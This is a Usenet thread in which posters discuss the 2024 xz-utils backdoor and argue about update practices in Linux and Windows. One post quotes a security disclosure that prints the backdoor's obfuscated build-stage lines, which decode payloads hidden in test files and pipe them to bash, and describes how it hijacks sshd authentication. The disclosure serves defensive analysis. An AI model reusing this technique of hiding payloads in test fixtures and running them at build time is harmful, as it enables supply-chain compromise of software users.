• Care to explain?

    From Indira@indira@ghandi.net to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 10:50:58 2024
    From Newsgroup: alt.os.linux

    Can someone explain how this happened?

    https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html

    Was it an insider who did it, or an outsider (China perhaps, for example)?
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From =?UTF-8?B?YmFk8J+SvXNlY3Rvcg==?=@forgetski@_INVALID.net to alt.os.linux on Sun Mar 31 06:59:29 2024
    From Newsgroup: alt.os.linux

    On 3/31/24 01:20, Indira wrote:
    Can someone explain how this happened?

    https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html

    Was it an insider who did it, or an outsider (China perhaps, for example)?

    x-post snipped

    The prime suspect always has to be the prime beneficiary. No need to go
    to China for that.

    https://imgur.com/Q7iwFbQ


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Newyana2@Newyana2@invalid.nospam to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 08:24:05 2024
    From Newsgroup: alt.os.linux

    "Indira" <indira@ghandi.net> wrote

    | Can someone explain how this happened?
    |
    | https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
    |
    | Was it an insider who did it, or an outsider (China perhaps, for example)?

    It appears that no one really knows: https://news.ycombinator.com/item?id=39865810

    It shouldn't be surprising. It's a massive web of constantly
    changing software, overseen by a massive boys' club of geeks,
    constantly forcing dripfeed updates onto Linux installs. As the
    saying goes, "What could go wrong?"

    The pattern is endemic to Linux culture: The OS itself is
    an ongoing project and social adhesive -- forever a work in
    progress and never a finished, smooth, thoroughly tested
    product. My install of OpenSuse would be downloading
    hundreds of micro-updates per week if I didn't stop it. I
    never chose any setting telling it to function as unsupervised
    spyware, constantly calling home for updates. The
    whole approach is a ridiculous mess. How could quality control
    possibly be carried out on so many constant changes? Linux
    is perennial beta software. Worse, loyalty to beta as a norm
    is expected in Linux culture.


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From J.O. Aho@user@example.net to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 15:21:27 2024
    From Newsgroup: alt.os.linux

    On 31/03/2024 14.24, Newyana2 wrote:
    "Indira" <indira@ghandi.net> wrote

    | Can someone explain how this happened?
    |
    | https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
    |
    | Was it an insider who did it, or an outsider (China perhaps, for example)?

    It appears that no one really knows: https://news.ycombinator.com/item?id=39865810

    Could be, this far it seems they may have been compromised and a third
    party (chines/russian/north korean/iranian/us/<fill in a country you dislike>...) injected changes in multiple stages.

    The exploit depends on multiple components, a system using systemd, the
    system has sshd running and has the affected version of xz-utils, even
    if you have all the stuff together it may not work as in the case with
    Fedora 40.

    In theory this backdoor could be in later versions of microsoft windows
    server which supports sshd, but I haven't checked into this myself so I
    can't say for sure if the authentication bypass works or not.


    It shouldn't be surprising. It's a massive web of constantly
    changing software, overseen by a massive boys' club of geeks,
    constantly forcing dripfeed updates onto Linux installs. As the
    saying goes, "What could go wrong?"

    And you never ask yourself why your ms-win98 is so slow and always do
    strange things and from time to time files suddenly encrypted...

    The reason why microsoft don't push their updates all the time is for
    the file system locks files, which makes it a pita to update a file that
    is already open and you can't just close a file when the OS itself needs
    if, so you need to reboot and in an early stage before the OS has
    started up replace the old file with the new one.

    So people don't want to reboot all the time, so the compromise is to
    have the OS vulnerable for a month. Then of course microsoft ain't known
    to be the fastest patcher of vulnerabilities, so you can be sitting with
    a vulnerability for some years.


    The pattern is endemic to Linux culture: The OS itself is
    an ongoing project

    This applies to microsoft windows and apple's macOS, they are ongoing projects, it's just the difference that you don't have access to the
    source code, this don't make the code better written, the number of vulnerabilities in those operating systems are many times more than in
    Linux itself.



    My install of OpenSuse would be downloading
    hundreds of micro-updates per week if I didn't stop it.

    Hardly it would be that even if you installed all the packages supplied
    by OpenSuse repo, machine I seldom use (maybe once in a quatre) I may
    have 200 packages to update when I start it and the binary size for less
    than the average monthly microsoft update.

    Keep in mind that most of the applications will have been wetter twice,
    once by the developers of the applications (sure standard varies) and
    then by the distribution maintainers, in your ecample it would be the
    OpenSuse guys.

    Microsoft has only one level, so that is why so many bugs gone
    undetected in their applications and it's not uncommon when they
    contribute to the Linux their pushes are reduced and they have to do
    fixes before accepted. Don't forget that they are one of the major contributors nowadays when they relay mainly on Linux for their major
    money bringing projects. They also maintain their own Linux distribution.


    I never chose any setting telling it to function as unsupervised
    spyware, constantly calling home for updates.

    That mainly closed source applications and operating systems which do
    that, I know Ubuntu was trying once in the time with that and they lost
    quite a lot of users.

    The
    whole approach is a ridiculous mess. How could quality control
    possibly be carried out on so many constant changes?

    Quite simple, most open source projects can get free static code
    inspection (this can be automated say when a pull request is made), a
    review is always needed before code are merged (how good it is depends
    on the maintainers, all from sloppy microsoft standard to BSD high
    standard) . This is the same way as most closed source projects also are
    done.
    --
    //Aho



    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Lew Pitcher@lew.pitcher@digitalfreehold.ca to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 14:11:39 2024
    From Newsgroup: alt.os.linux

    On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:

    Can someone explain how this happened?

    https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html

    Was it an insider who did it, or an outsider (China perhaps, for example)?

    Summary based on my reading of various posts and emails (not guaranteed
    to be complete, or completely current/accurate)

    Bad actor weasles their way into the xz/liblzma project (the owner/maintainer of the project seems to be an overworked one-man-band, and while the project
    is peripheral to major systems, it is still part of the necessary infrastructure).

    Bad actor builds up enough good will to be named as a co-maintainer of the project.

    Bad actor gradually (over the course of a couple of years) checks in various patches that, under a seemingly complex set of build requirements (X86 Linux, debian or redhat derivative with systemd, etc), causes liblzma code to manipulate
    the internals of sshd to backpatch it with an RCE backdoor.

    The bad actor used a vaguely chinese name, and hid behind a VPN with a public endpoint in (IIRC) Singapore. BUT, there's no obvious way to tie such an anonymous
    actor to a specific country; names can be assumed, VPNs can disguise locations, and the email address was a generic gmail address available worldwide.


    As for the discovery: a Postgresql developer was performing some tuning, and found a half-second discrepancy in how long it took sshd to authenticate connections. Much deep diving with profiling tools later, the developer tracked down the delay and found all the mess that the bad actor installed.

    The developer reported it to various interested parties two days ago, and the story unfolded from there.
    --
    Lew Pitcher
    "In Skills We Trust"
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 17:38:59 2024
    From Newsgroup: alt.os.linux

    On 2024-03-31 16:11, Lew Pitcher wrote:
    On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:

    Can someone explain how this happened?

    https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html

    Was it an insider who did it, or an outsider (China perhaps, for example)?

    Summary based on my reading of various posts and emails (not guaranteed
    to be complete, or completely current/accurate)

    Bad actor weasles their way into the xz/liblzma project (the owner/maintainer of the project seems to be an overworked one-man-band, and while the project is peripheral to major systems, it is still part of the necessary infrastructure).

    Bad actor probably paid by some country or mafia with money and resources.

    https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor


    Bad actor builds up enough good will to be named as a co-maintainer of the project.

    Bad actor gradually (over the course of a couple of years) checks in various patches that, under a seemingly complex set of build requirements (X86 Linux, debian or redhat derivative with systemd, etc), causes liblzma code to manipulate
    the internals of sshd to backpatch it with an RCE backdoor.

    The bad actor used a vaguely chinese name, and hid behind a VPN with a public endpoint in (IIRC) Singapore. BUT, there's no obvious way to tie such an anonymous
    actor to a specific country; names can be assumed, VPNs can disguise locations,
    and the email address was a generic gmail address available worldwide.


    As for the discovery: a Postgresql developer was performing some tuning, and found a half-second discrepancy in how long it took sshd to authenticate connections. Much deep diving with profiling tools later, the developer tracked
    down the delay and found all the mess that the bad actor installed.

    The developer reported it to various interested parties two days ago, and the story unfolded from there.

    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Newyana2@Newyana2@invalid.nospam to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 14:17:50 2024
    From Newsgroup: alt.os.linux

    "J.O. Aho" <user@example.net> wrote

    | > The
    | > whole approach is a ridiculous mess. How could quality control
    | > possibly be carried out on so many constant changes?
    |
    | Quite simple, most open source projects can get free static code
    | inspection (this can be automated say when a pull request is made), a
    | review is always needed before code are merged (how good it is depends
    | on the maintainers, all from sloppy microsoft standard to BSD high
    | standard) . This is the same way as most closed source projects also are
    | done.
    |

    I don't see it as a closed vs open issue. Microsoft
    now do the same dripfeed updating. Essentially, the
    SOHo customer base are now an unpaid beta testing
    army.

    I've had to make efforts to block these unknown updates
    in both Win10 and Suse. (And yes, it is in the 100s. I had
    my firewall down briefly after a week or two when Suse couldn't
    call home. It told me I had 360 updates waiting. What are
    they? Who knows. Most of the ames are not informative, even
    if I wanted to look through 360 updates. It's nuts. I didn't
    agree to be a beta testing volunteer for programmers who
    can't stop fiddling. I'm guessing they may spend more time
    rebuilding the install package than actually writing the software.)

    The way it used to work is that software was thoroughly
    tested before release. Then another version might come out
    in maybe a year. At that point people might try it out, or they
    might wait for reviews. And one could easily find a list of
    actual changes in the new version. Most of my Windows software
    hasn't been updated in ages and still works fine. But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    Apple is a different thing. They serve a consumer-only audience,
    updating periodically with stable releases and quickly dropping
    support for older products. Their aim is to sell a lot of very
    dependable devices to a tech-illiterate customer base, which is
    a different business model.

    If someone screws up and needs to issue a fix, that's fine.
    But it shouldn't happen very often. An OS on a computer that's
    actually in use shouldn't be getting dripfeed updates. It should
    be getting updates rarely and then with good reason. MS know that.
    That's why they let corporate customers update periodically and
    test out the changes before rolling them out.


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Frank Slootweg@this@ddress.is.invalid to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 18:57:58 2024
    From Newsgroup: alt.os.linux

    Newyana2 <Newyana2@invalid.nospam> wrote:
    [...]

    But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    With "every few days" actually being *a month* and you only get a
    "Please wait." message if you're stupid enough not to set your 'Active
    hours'.

    And "at boot every few days"!? My system is up from one monthly update
    cycle to the next, no silly business with booting in between.

    [...]
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 22:31:19 2024
    From Newsgroup: alt.os.linux

    On 2024-03-31 20:17, Newyana2 wrote:
    "J.O. Aho" <user@example.net> wrote

    | > The
    | > whole approach is a ridiculous mess. How could quality control
    | > possibly be carried out on so many constant changes?
    |
    | Quite simple, most open source projects can get free static code
    | inspection (this can be automated say when a pull request is made), a
    | review is always needed before code are merged (how good it is depends
    | on the maintainers, all from sloppy microsoft standard to BSD high
    | standard) . This is the same way as most closed source projects also are
    | done.
    |

    I don't see it as a closed vs open issue. Microsoft
    now do the same dripfeed updating. Essentially, the
    SOHo customer base are now an unpaid beta testing
    army.

    I've had to make efforts to block these unknown updates
    in both Win10 and Suse. (And yes, it is in the 100s. I had
    my firewall down briefly after a week or two when Suse couldn't
    call home. It told me I had 360 updates waiting. What are
    they? Who knows. Most of the ames are not informative, even
    if I wanted to look through 360 updates. It's nuts. I didn't
    agree to be a beta testing volunteer for programmers who
    can't stop fiddling. I'm guessing they may spend more time
    rebuilding the install package than actually writing the software.)

    The way it used to work is that software was thoroughly
    tested before release. Then another version might come out
    in maybe a year. At that point people might try it out, or they
    might wait for reviews. And one could easily find a list of
    actual changes in the new version. Most of my Windows software
    hasn't been updated in ages and still works fine. But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    You should read "The cathedral and the bazaar".


    Apple is a different thing. They serve a consumer-only audience,
    updating periodically with stable releases and quickly dropping
    support for older products. Their aim is to sell a lot of very
    dependable devices to a tech-illiterate customer base, which is
    a different business model.

    If someone screws up and needs to issue a fix, that's fine.
    But it shouldn't happen very often. An OS on a computer that's
    actually in use shouldn't be getting dripfeed updates. It should
    be getting updates rarely and then with good reason. MS know that.
    That's why they let corporate customers update periodically and
    test out the changes before rolling them out.


    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Chris@ithinkiam@gmail.com to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 20:38:02 2024
    From Newsgroup: alt.os.linux

    Newyana2 <Newyana2@invalid.nospam> wrote:
    "Indira" <indira@ghandi.net> wrote

    | Can someone explain how this happened?
    |
    | https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
    |
    | Was it an insider who did it, or an outsider (China perhaps, for example)?

    It appears that no one really knows: https://news.ycombinator.com/item?id=39865810

    It shouldn't be surprising. It's a massive web of constantly
    changing software, overseen by a massive boys' club of geeks,
    constantly forcing dripfeed updates onto Linux installs. As the
    saying goes, "What could go wrong?"

    The pattern is endemic to Linux culture: The OS itself is
    an ongoing project and social adhesive -- forever a work in
    progress and never a finished, smooth, thoroughly tested
    product. My install of OpenSuse would be downloading
    hundreds of micro-updates per week if I didn't stop it. I
    never chose any setting telling it to function as unsupervised
    spyware, constantly calling home for updates. The
    whole approach is a ridiculous mess. How could quality control
    possibly be carried out on so many constant changes? Linux
    is perennial beta software. Worse, loyalty to beta as a norm
    is expected in Linux culture.

    Security is a balance and given that all software has bugs I'd much rather install updates - especially security ones - regularly rather than not. You
    can set most distros to only install security updates if you prefer.

    Given all your concerns above, OSS is at least no worse than proprietary software. Just think of all the major vulnerabilities over the years. Most
    have either been due to unpatched known vulnerabilities or bugsin
    proprietary software.


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Newyana2@Newyana2@invalid.nospam to alt.comp.os.windows-10,alt.os.linux on Sun Mar 31 17:54:45 2024
    From Newsgroup: alt.os.linux

    "Carlos E.R." <robin_listas@es.invalid> wrote

    | > The way it used to work is that software was thoroughly
    | > tested before release. Then another version might come out
    | > in maybe a year. At that point people might try it out, or they
    | > might wait for reviews. And one could easily find a list of
    | > actual changes in the new version. Most of my Windows software
    | > hasn't been updated in ages and still works fine. But Microsoft and
    | > Linux are now both guilty of seat-of-the-pants updating. If it
    | > isn't stopped, Windows will show a message at boot every few
    | > days: "Please wait. Installing updates."
    |
    | You should read "The cathedral and the bazaar".
    |
    That's addressing how to develop software. But then there's
    the point at which the software is done, thoroughly tested,
    and put to use. It needs to be well designed and stable. It
    needs to do what people need. Then it needs to stay put.

    Software shouldn't be a sexy business, with constant redesign.
    What happens more often than not in the Linux world might
    be called the greasemonkey syndrome. That's the case where
    someone has a car on his front lawn and continually works
    on tuning it up, adding scoops, and so on. He never quite gets
    around to driving the car. He just likes to tinker.

    For all Microsoft's faults, there's the advantage that their business
    depends on business users. So Windows has to be stable, it has to
    have a well documented API, and backward compatibility is critical
    because businesses build their own inhouse software. I can write
    software today on Windows that runs on every Windows machine in
    the world, with no support files needed. With Macs one gets 2-3
    years backard compatibility. With Linux it's a moving target. I'm
    still using a 25 year old Paint Shop Pro on my 23 year old WinXP.
    I'm still using current Firefox on 14 year old Win7. I had to update
    my 4 year old Raspberry Pi OS because it couldn't run the latest
    Chromium. It could only run Chromium 92, released in 2021. The
    whole thing has to be periodically replaced.


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Bugsy@bugsy@zimage.comBUGSY to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 08:51:59 2024
    From Newsgroup: alt.os.linux

    "Carlos E.R." <robin_listas@es.invalid> wrote:

    Bad actor probably paid by some country or mafia with money and resources.

    https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor

    Very sophisticated. Their grand scheme was:

    1) sneakily backdoor the release tarballs, but not the source code

    2) use sockpuppet accounts to convince the various Linux distributions to
    pull the latest version and package it

    3) once those distributions shipped it, they could take over any downstream user/company system/etc


    https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/
    --
    Please wear your mask!
    Bugs are everywhere. :)
    !__!
    (@)(@)
    \.'||'./
    -: :: :-
    /'..''..'\
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Mickey D@mickeydavis078XX@ptd.net to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 05:01:37 2024
    From Newsgroup: alt.os.linux

    On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:

    Was it an insider who did it, or an outsider (China perhaps, for example)?

    Who did it?

    Your mum. Just kidding, it was GCHQ in Cheltnam. Just kidding, it was
    Russia. Just kidding, it was China. Just kidding, it was America. Just
    kidding, it was definitely your mum.

    How advanced was the threat actor?

    The backdoor attempt was a very serious one, with a very high bar of
    knowledge, research, development and tradecraft to reach this far into the Linux ecosystem. Additionally, changes made by the threat actor on Github
    span multiple years, and include things like introducing functions
    incompatible with OSS Fuzzer due to outstanding small issues since 2015,
    then getting OSS Fuzzer to exclude XZ Utils from scanning last year. The backdoor itself is super well put together, and even includes the ability
    to remotely deactivate and remove the backdoor via a kill command.

    https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Larry Wolff@larrywolff@larrywolff.net to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 09:05:51 2024
    From Newsgroup: alt.os.linux

    On 3/31/2024 2:11 PM, Lew Pitcher wrote:

    The developer reported it to various interested parties two days ago, and the story unfolded from there.

    https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd

    Date: Fri, 29 Mar 2024 08:51:26 -0700
    From: Andres Freund <andres@...razel.de>
    To: oss-security@...ts.openwall.com
    Subject: backdoor in upstream xz/liblzma leading to ssh server compromise

    Hi,

    After observing a few odd symptoms around liblzma (part of the xz package)
    on
    Debian sid installations over the last weeks (logins with ssh taking a lot
    of
    CPU, valgrind errors) I figured out the answer:

    The upstream xz repository and the xz tarballs have been backdoored.

    At first I thought this was a compromise of debian's package, but it turns
    out
    to be upstream.


    == Compromised Release Tarball ==

    One portion of the backdoor is *solely in the distributed tarballs*. For
    easier reference, here's a link to debian's import of the tarball, but it
    is
    also present in the tarballs for 5.6.0 and 5.6.1:

    https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63

    That line is *not* in the upstream source of build-to-host, nor is build-to-host used by xz in git. However, it is present in the tarballs released upstream, except for the "source code" links, which I think github generates directly from the repository contents:

    https://github.com/tukaani-project/xz/releases/tag/v5.6.0 https://github.com/tukaani-project/xz/releases/tag/v5.6.1


    This injects an obfuscated script to be executed at the end of configure.
    This
    script is fairly obfuscated and data from "test" .xz files in the
    repository.


    This script is executed and, if some preconditions match, modifies $builddir/src/liblzma/Makefile to contain

    am__test = bad-3-corrupt_lzma2.xz
    ...
    am__test_dir=$(top_srcdir)/tests/files/$(am__test)
    ...
    sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1


    which ends up as
    ...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " \-_" "
    _\-" | xz -d | /bin/bash >/dev/null 2>&1; ...

    Leaving out the "| bash" that produces

    ####Hello####
    #��Z�.hj�
    eval `grep ^srcdir= config.status`
    if test -f ../../config.status;then
    eval `grep ^srcdir= ../../config.status`
    srcdir="../../$srcdir"
    fi
    export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048
    && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
    /dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048
    && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
    /dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048
    && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
    /dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048
    && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
    /dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048
    && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
    /dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw
    --lzma1 -dc|/bin/sh
    ####World####

    After de-obfuscation this leads to the attached injected.txt.


    == Compromised Repository ==

    The files containing the bulk of the exploit are in an obfuscated form in
    tests/files/bad-3-corrupt_lzma2.xz
    tests/files/good-large_compressed.lzma
    committed upstream. They were initially added in https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

    Note that the files were not even used for any "tests" in 5.6.0.


    Subsequently the injected code (more about that below) caused valgrind
    errors
    and crashes in some configurations, due the stack layout differing from
    what
    the backdoor was expecting. These issues were attempted to be worked
    around
    in 5.6.1:

    https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad
    https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f
    https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92

    For which the exploit code was then adjusted: https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89

    Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their
    system. Unfortunately the latter looks like the less likely explanation,
    given
    they communicated on various lists about the "fixes" mentioned above.


    Florian Weimer first extracted the injected code in isolation, also
    attached,
    liblzma_la-crc64-fast.o, I had only looked at the whole binary. Thanks!


    == Affected Systems ==

    The attached de-obfuscated script is invoked first after configure, where
    it
    decides whether to modify the build process to inject the code.

    These conditions include targeting only x86-64 linux:
    if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

    Building with gcc and the gnu linker
    if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
    exit 0
    fi
    if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
    exit 0
    fi
    LDv=$LD" -v"
    if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
    exit 0

    Running as part of a debian or RPM package build:
    if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

    Particularly the latter is likely aimed at making it harder to reproduce
    the
    issue for investigators.


    Due to the working of the injected code (see below), it is likely the
    backdoor
    can only work on glibc based systems.


    Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by linux distributions, and where they have, mostly in pre-release versions.


    == Observing Impact on openssh server ==

    With the backdoored liblzma installed, logins via ssh become a lot slower.

    time ssh nonexistant@...alhost

    before:
    nonexistant@...alhost: Permission denied (publickey).

    before:
    real 0m0.299s
    user 0m0.202s
    sys 0m0.006s

    after:
    nonexistant@...alhost: Permission denied (publickey).

    real 0m0.807s
    user 0m0.202s
    sys 0m0.006s


    openssh does not directly use liblzma. However debian and several other distributions patch openssh to support systemd notification, and libsystemd does depend on lzma.


    Initially starting sshd outside of systemd did not show the slowdown,
    despite
    the backdoor briefly getting invoked. This appears to be part of some countermeasures to make analysis harder.

    Observed requirements for the exploit:
    a) TERM environment variable is not set
    b) argv[0] needs to be /usr/sbin/sshd
    c) LD_DEBUG, LD_PROFILE are not set
    d) LANG needs to be set
    e) Some debugging environments, like rr, appear to be detected. Plain gdb
    appears to be detected in some situations, but not others

    To reproduce outside of systemd, the server can be started with a clear environment, setting only the required variable:

    env -i LANG=en_US.UTF-8 /usr/sbin/sshd -D


    In fact, openssh does not need to be started as a server to observe the slowdown:

    slow:
    env -i LANG=C /usr/sbin/sshd -h

    (about 0.5s on my older system)


    fast:
    env -i LANG=C TERM=foo /usr/sbin/sshd -h
    env -i LANG=C LD_DEBUG=statistics /usr/sbin/sshd -h
    ...

    (about 0.01s on the same system)


    It's possible that argv[0] other /usr/sbin/sshd also would have effect -
    there
    are obviously lots of servers linking to libsystemd.


    == Analyzing the injected code ==

    I am *not* a security researcher, nor a reverse engineer. There's lots of stuff I have not analyzed and most of what I observed is purely from observation rather than exhaustively analyzing the backdoor code.

    To analyze I primarily used "perf record -e intel_pt//ub" to observe where execution diverges between the backdoor being active and not. Then also
    gdb,
    setting breakpoints before the divergence.


    The backdoor initially intercepts execution by replacing the ifunc
    resolvers
    crc32_resolve(), crc64_resolve() with different code, which calls
    _get_cpuid(), injected into the code (which previously would just be static inline functions). In xz 5.6.1 the backdoor was further obfuscated,
    removing
    symbol names.

    These functions get resolved during startup, because sshd is built with -Wl,-z,now, leading to all symbols being resolved early. If started with LD_BIND_NOT=1 the backdoor does not appear to work.


    Below crc32_resolve() _get_cpuid() does not do much, it just sees that a 'completed' variable is 0 and increments it, returning the normal cpuid
    result
    (via a new _cpuid()). It gets to be more interesting during
    crc64_resolve().

    In the second invocation crc64_resolve() appears to find various
    information,
    like data from the dynamic linker, program arguments and environment. Then
    it
    perform various environment checks, including those above. There are other checks I have not fully traced.

    If the above decides to continue, the code appears to be parsing the symbol tables in memory. This is the quite slow step that made me look into the
    issue.


    Notably liblzma's symbols are resolved before many of the other libraries, including the symbols in the main sshd binary. This is important because symbols are resolved, the GOT gets remapped read-only thanks to
    -Wl,-z,relro.


    To be able to resolve symbols in libraries that have not yet loaded, the backdoor installs an audit hook into the dynamic linker, which can be
    observed
    with gdb using
    watch _rtld_global_ro._dl_naudit
    It looks like the audit hook is only installed for the main binary.

    That hook gets called, from _dl_audit_symbind, for numerous symbols in the
    main binary. It appears to wait for "RSA_public_decrypt@....plt" to be resolved. When called for that symbol, the backdoor changes the value of RSA_public_decrypt@....plt to point to its own code. It does not do this
    via
    the audit hook mechanism, but outside of it.

    For reasons I do not yet understand, it does change sym.st_value *and* the return value of from the audit hook to a different value, which leads _dl_audit_symbind() to do nothing - why change anything at all then?

    After that the audit hook is uninstalled again.

    It is possible to change the got.plt contents at this stage because it has
    not
    (and can't yet) been remapped to be read-only.


    I suspect there might be further changes performed at this stage.


    == Impact on sshd ==

    The prior section explains that RSA_public_decrypt@....plt was redirected
    to
    point into the backdoor code. The trace I was analyzing indeed shows that during a pubkey login the exploit code is invoked:

    sshd 1736357 [010] 714318.734008: 1 branches:uH: 5555555ded8c ssh_rsa_verify+0x49c (/usr/sbin/sshd) => 5555555612d0 RSA_public_decrypt@...+0x0 (/usr/sbin/sshd)

    The backdoor then calls back into libcrypto, presumably to perform normal authentication

    sshd 1736357 [010] 714318.734009: 1 branches:uH: 7ffff7c137cd [unknown] (/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.0) => 7ffff792a2b0 RSA_get0_key+0x0 (/usr/lib/x86_64-linux-gnu/libcrypto.so.3)


    I have not yet analyzed precisely what is being checked for in the injected code, to allow unauthorized access. Since this is running in a pre-authentication context, it seems likely to allow some form of access or other form of remote code execution.

    I'd upgrade any potentially vulnerable system ASAP.


    == Bug reports ==

    Given the apparent upstream involvement I have not reported an upstream
    bug. As I initially thought it was a debian specific issue, I sent a more preliminary report to security@...ian.org. Subsequently I reported the
    issue
    to distros@. CISA was notified by a distribution.

    Red Hat assigned this issue CVE-2024-3094.


    == Detecting if installation is vulnerable ==

    Vegard Nossum wrote a script to detect if it's likely that the ssh binary
    on a
    system is vulnerable, attached here. Thanks!


    Greetings,

    Andres Freund

    View attachment "injected.txt" of type "text/plain" (8236 bytes)

    Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)

    Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
    Powered by blists - more mailing lists

    Please check out the Open Source Software Security Wiki, which is
    counterpart to this mailing list.

    Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From J.O. Aho@user@example.net to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 13:21:14 2024
    From Newsgroup: alt.os.linux

    On 31/03/2024 20.17, Newyana2 wrote:
    "J.O. Aho" <user@example.net> wrote

    | > The
    | > whole approach is a ridiculous mess. How could quality control
    | > possibly be carried out on so many constant changes?
    |
    | Quite simple, most open source projects can get free static code
    | inspection (this can be automated say when a pull request is made), a
    | review is always needed before code are merged (how good it is depends
    | on the maintainers, all from sloppy microsoft standard to BSD high
    | standard) . This is the same way as most closed source projects also are
    | done.
    |

    I don't see it as a closed vs open issue. Microsoft
    now do the same dripfeed updating. Essentially, the
    SOHo customer base are now an unpaid beta testing
    army.

    That was the feeling one got reading, bashing on open source development model, which in reality don't be that much different from remote working setups with the exception that developers not gone trough a silly interview.


    I've had to make efforts to block these unknown updates
    in both Win10 and Suse.

    In microsoft updates you can't opt out from specific updates, everything
    is bundled together, while for example with Suse you can block specific packages from being updated (in the long run you may get a dependency
    issue, not my problem).

    > (And yes, it is in the 100s. I had
    my firewall down briefly after a week or two when Suse couldn't
    call home.

    What you call for calling home for Suse is just a fetch of the latest
    status on what packages exists in the remote repository and some
    metadata, so it's one way communication, sure the remote end could store
    your IP and which repository you was fetching from.

    It's on your local system that the calculation is done which packages
    are needed to be installed to get everything up to latest version.

    This differs much from the microsoft way, which you tell everything to microsoft and they tell you what to install.


    It told me I had 360 updates waiting. What are
    they?

    The update applet in Suse would tell you about which CVE are resolved in
    the new update, the exception was Tumbleweed as the release was consider experimental and you could have many package updates for multiple reasons.

    Keep in mind that in 99% of the cases you already have them installed
